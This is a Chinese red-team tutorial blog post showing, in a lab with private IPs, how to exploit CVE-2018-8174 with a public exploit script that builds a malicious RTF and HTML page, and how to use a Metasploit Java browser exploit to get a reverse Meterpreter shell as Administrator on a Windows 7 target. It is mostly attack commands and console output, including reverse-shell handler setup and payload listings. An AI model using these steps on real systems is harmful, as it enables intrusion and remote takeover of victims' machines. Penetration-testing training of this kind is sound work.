红队/白帽必经之路(24)——实战之如何通过Metasploit 利用 已知 漏洞 CVE-2018-8174 以及基于 java 环境的漏洞利用获取 获取 shell[既然是红队,那就对自己狠一点]
红队/白帽必经之路(24)——实战之如何通过Metasploit 利用 已知 漏洞 CVE-2018-8174 以及基于 java 环境的漏洞利用获取 获取 shell[既然是红队,那就对自己狠一点]
盛透侧视攻城狮
发布于 2024-12-25 09:29:14
发布于 2024-12-25 09:29:14
1.利用 已知漏洞 CVE-2018-8174 获取 shell
1.2安装 CVE-2018-8174_EXP
git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# unzip CVE-2018-8174_EXP-master.zip
Archive: CVE-2018-8174_EXP-master.zip
d055e4d56920f10303f9a8879c8eb47e22abb01d
creating: CVE-2018-8174_EXP-master/
inflating: CVE-2018-8174_EXP-master/CVE-2018-8174.py
inflating: CVE-2018-8174_EXP-master/README.md 1.3生成恶意 html 文件
┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# ls
CVE-2018-8174.py README.md┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# python2 CVE-2018-8174.py -u http://192.168.234.141/exploit.html -o hack.rtf -i 192.168.234.141 -p 4444
UNICODE_URL len 138 , need to pad ...
Generated hack.rtf successfully
!!! Completed !!!参数详解说明:
- -u:URL 地址,恶意 html 文件 hack.html 的访问地址
- -o:生成文档
- -i:监听地址
- -p:监听端口
将恶意 html 文件移动到网站根目录
┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# cp exploit.html /var/www/html/启动 apache2 服务
┌──(root㉿kali-2024)-[/home/ljs/Desktop/CVE-2018-8174_EXP-master]
└─# service apache2 start 
新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听
msf6 exploit(multi/handler) > back
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.234.141
LHOST => 192.168.234.141
msf6 exploit(multi/handler) > exploit进入 win7靶机,打开浏览器,访问[也有可能是受害者点击恶意链接]恶意链接
http://192.168.234.141/exploit.html
返回 kali 查看已经建立会话,攻击获取shell成功
2.基于 java 环境的漏洞利用获取 shell
2.1搭建 java 环境
第一步我们先安装 java 环境上传 jre 到 win7 或 xp 操作系统
安装过程,一直点击下一步即可
2.2使用 java 模块 getshell
msf6 exploit(multi/handler) > use exploit/multi/browser/java_jre17_driver_manager
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > show options
Module options (exploit/multi/browser/java_jre17_driver_manager):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This m
ust be an address on the local machine or 0.0.0.0 to lis
ten on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly ge
nerated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.79.135 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
View the full module info with the info, or info -d command.
注意:
- 上图 target 是一个通用的 java payload。
- 我们可以自己指定一个。
msf6 exploit(multi/browser/java_jre17_driver_manager) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_aws_instance_connect normal No Unix SSH Shell, Bind Instance Connect (via AWS API)
1 payload/generic/custom normal No Custom Payload
2 payload/generic/shell_bind_aws_ssm normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact normal No Interact with Established SSH Connection
6 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
7 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
8 payload/java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager
9 payload/java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager
10 payload/java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager
11 payload/java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager
12 payload/java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager
13 payload/java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager
14 payload/java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline
15 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
16 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
msf6 exploit(multi/browser/java_jre17_driver_manager) > java/meterpreter/reverse_tcpInterrupt: use the 'exit' command to quit
msf6 exploit(multi/browser/java_jre17_driver_manager) > set paylod java/meterpreter/reverse_tcp
[!] Unknown datastore option: paylod. Did you mean PAYLOAD?
paylod => java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/browser/java_jre17_driver_manager) > jobs -K
Stopping all jobs...
msf6 exploit(multi/browser/java_jre17_driver_manager) > run
补充说明:
- 如果出现如下这个错误提示,说明 4444 端口被占用
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# lsof -i:4444
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
ruby 179670 root 8u IPv4 425867 0t0 TCP *:4444 (LISTEN)
将该进程杀死
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# kill -9 179670
在 win7 上安装 java 环境
- win7 主机访问http://192.168.1.53:8080/bUry5GxBnxluT
- win7需要配置远程连接端口为4444
- 提示我们 java 版本需要更新我们点击 later 先不更新
- 然后突然发现运行了一个 java 程序,但是用户关闭了 java 程序也不影响我们 session 的正常访问。
回到 MSF 控制台
Session 已经建立然后可以发现我们是Administrator了
msf6 exploit(multi/browser/java_jre17_driver_manager) > sessions -i 6
meterpreter > getuid
Server username: Administrator本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-12-25,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号